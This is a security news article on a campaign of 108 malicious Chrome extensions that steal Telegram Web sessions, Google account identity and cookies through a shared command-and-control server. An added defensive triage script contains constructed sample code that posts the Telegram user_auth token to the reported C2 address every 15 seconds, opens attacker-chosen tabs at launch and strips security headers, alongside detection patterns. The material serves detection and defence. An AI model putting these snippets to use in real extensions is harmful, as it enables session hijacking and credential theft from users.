108 Malicious Chrome Extensions Steal Google and Telegram Data, Affecting 20,000 Users

Cybersecurity researchers have discovered a new campaign in which 108 Google Chrome extensions were found to communicate with shared command-and-control (C2) infrastructure, with the aim of collecting user data and enabling browser-level abuse by injecting ads and malicious JavaScript into every web page the victim visits.
According to Socket, the extensions have been published under five different publisher identities – Yana Project, GameGen, SideGames, Rodeo Games, and InterAlt – and have collectively accumulated around 20,000 installations on the Chrome Web Store.
“All 108 exfiltrate cookies, user credentials, and browsing data to servers controlled by the same operator,” security researcher Kush Pandya said in an analysis.
Of these, 54 extensions steal Google account credentials via OAuth2, 45 extensions contain a universal backdoor that opens arbitrary URLs as soon as the browser is launched, and the rest engage in various malicious behaviors –
- Exfiltrate Telegram Web sessions every 15 seconds
- Strip YouTube and TikTok security headers (i.e., Content-Security-Policy, X-Frame-Options, and CORS headers) and add gambling and ad overlays
- Add content scripts to every page the user visits
- Proxy all translation requests through the threat actor’s server

In an effort to appear legitimate, the identified extensions pose as Telegram sidebar clients, slot machine and Keno games, YouTube and TikTok enhancements, text translation tools, and page utilities. The advertised functionality is deliberately varied to cast a wide net, while all of the extensions share the same backend.
Unbeknownst to users, however, malicious code running in the background captures session information, injects malicious scripts, and opens URLs of the attacker’s choosing.
Some of the mentioned extensions are listed below –
- Telegram Multi-account (ID: obifanppcpchlehkjipahhphbcbjekfa), which reads the user_auth token used by Telegram Web and sends it to a remote server. It can also overwrite Local Storage with actor-provided session data and force-reload the messaging app, effectively replacing the victim’s Telegram session with one chosen by the threat actor.
- Telegram Web Client – Teleside (ID: mdcfennpfgkngnibjbpnpaafcjnhcjno), which strips Telegram’s security headers and injects scripts to steal Telegram sessions.
- Formula Rush Racing Game (ID: akebbllmckjphjiojeiooidhnddnplj), which steals the user’s Google account identity the first time the victim clicks the login button. This includes the email address, full name, profile picture URL, and Google account identifier.
“Five extensions use Chrome’s DeclarativeNetRequest API to strip security headers from target sites before the page loads,” Socket said. “All 108 malicious extensions share the same backend, hosted at 144.126.135[.]238.”
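The behaviours above (security-header stripping via declarativeNetRequest, a content script on every page, a 15-second Telegram session poll, and the open-a-URL-at-launch backdoor) all leave static traces in an unpacked extension. The following triage script is an added example, not Socket’s tooling or code from any of the listed extensions: it scores an extracted extension directory against those indicators. The heuristics, the function names, the `suspicious` threshold, and the sample manifest, rule file, and script sources are all constructed for illustration; only the C2 address and the header names come from the report.

```javascript
// Added triage script (not Socket's tooling): scores an unpacked Chrome extension
// against the behaviours described in the report. Inputs are parsed manifest/rule
// JSON and script source strings, so it runs offline on any extracted .crx directory.
// Heuristics, thresholds and sample data are constructed for this example.

const STRIPPED_HEADERS = new Set([
  'content-security-policy', 'content-security-policy-report-only',
  'x-frame-options', 'access-control-allow-origin',
]);
const KNOWN_C2 = '144.126.135.238'; // backend named in the Socket report

// declarativeNetRequest rules: a modifyHeaders action that removes a security
// header before the page loads is the header-stripping primitive described above.
function auditDnrRules(rules) {
  const findings = [];
  for (const rule of rules) {
    if (rule.action?.type !== 'modifyHeaders') continue;
    for (const h of rule.action.responseHeaders ?? []) {
      if (h.operation === 'remove' && STRIPPED_HEADERS.has(h.header.toLowerCase())) {
        findings.push(`rule ${rule.id} strips ${h.header} on ${rule.condition?.urlFilter ?? '<any url>'}`);
      }
    }
  }
  return findings;
}

// manifest.json: broad host access plus a content script matching every page is
// what "add content scripts to every page the user visits" looks like on disk.
function auditManifest(manifest) {
  const findings = [];
  const allUrls = (m) => m === '<all_urls>' || m === '*://*/*';
  const perms = new Set(manifest.permissions ?? []);
  if (perms.has('declarativeNetRequest') || perms.has('declarativeNetRequestWithHostAccess')) {
    findings.push('can rewrite response headers (declarativeNetRequest)');
  }
  if (perms.has('identity')) findings.push('can request Google account tokens (identity)');
  if ((manifest.host_permissions ?? []).some(allUrls)) findings.push('host access to all URLs');
  if ((manifest.content_scripts ?? []).some((cs) => (cs.matches ?? []).some(allUrls))) {
    findings.push('content script injected into every page');
  }
  return findings;
}

// Script sources: string/regex indicators for the C2, the 15-second session poll,
// localStorage session replacement, Google identity access and the launch-time backdoor.
const SOURCE_INDICATORS = [
  [new RegExp(KNOWN_C2.replace(/\./g, '\\.')), `contacts known C2 ${KNOWN_C2}`],
  [/setInterval\s*\([\s\S]*?,\s*15000\s*\)/, '15-second polling loop'],
  [/user_auth/, 'reads or writes the Telegram Web user_auth token'],
  [/localStorage\.setItem\s*\(/, 'writes localStorage (possible session replacement)'],
  [/chrome\.identity\.(getAuthToken|launchWebAuthFlow|getProfileUserInfo)/, 'uses chrome.identity'],
  [/chrome\.runtime\.onStartup/, 'runs code at browser launch'],
  [/chrome\.tabs\.create\s*\(/, 'opens attacker-chosen tabs'],
];
function auditSource(js) {
  return SOURCE_INDICATORS.filter(([re]) => re.test(js)).map(([, label]) => label);
}

// Combine the three views; three or more hits is an arbitrary triage threshold.
function auditExtension({ manifest, rules = [], sources = {} }) {
  const findings = [
    ...auditManifest(manifest),
    ...auditDnrRules(rules),
    ...Object.entries(sources).flatMap(([file, js]) => auditSource(js).map((f) => `${file}: ${f}`)),
  ];
  return { suspicious: findings.length >= 3, findings };
}

// Constructed sample extension (not a real listing) modelled on the reported behaviour.
const SAMPLE = {
  manifest: {
    manifest_version: 3,
    permissions: ['declarativeNetRequest', 'storage'],
    host_permissions: ['<all_urls>'],
    content_scripts: [{ matches: ['<all_urls>'], js: ['content.js'] }],
    declarative_net_request: { rule_resources: [{ id: 'r', enabled: true, path: 'rules.json' }] },
  },
  rules: [
    { id: 1, priority: 1,
      action: { type: 'modifyHeaders', responseHeaders: [
        { header: 'content-security-policy', operation: 'remove' },
        { header: 'x-frame-options', operation: 'remove' } ] },
      condition: { urlFilter: '||youtube.com', resourceTypes: ['main_frame'] } },
  ],
  sources: {
    'background.js': `chrome.runtime.onStartup.addListener(async () => {
      const r = await fetch('http://144.126.135.238/start');
      chrome.tabs.create({ url: (await r.json()).url });
    });`,
    'content.js': `setInterval(() => {
      const t = localStorage.getItem('user_auth');
      fetch('http://144.126.135.238/tg', { method: 'POST', body: t });
    }, 15000);`,
  },
};

console.log(JSON.stringify(auditExtension(SAMPLE), null, 2));
```

The rule check is the most reliable of the three: a `modifyHeaders` rule with `operation: "remove"` on `content-security-policy` or `x-frame-options` has no legitimate use in a game or translation tool, and the rule file is plain JSON that Chrome requires the extension to ship unobfuscated. The source indicators are weaker (obfuscated bundles can split the C2 string or the interval constant), so treat them as leads to confirm by loading the extension in an isolated profile and watching its network traffic.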
It is currently unknown who is behind the extensions. However, analysis of the source code revealed Russian-language comments throughout several of them.
Users who have installed any of these extensions are advised to remove them immediately and terminate all active Telegram Web sessions from the Telegram mobile app.
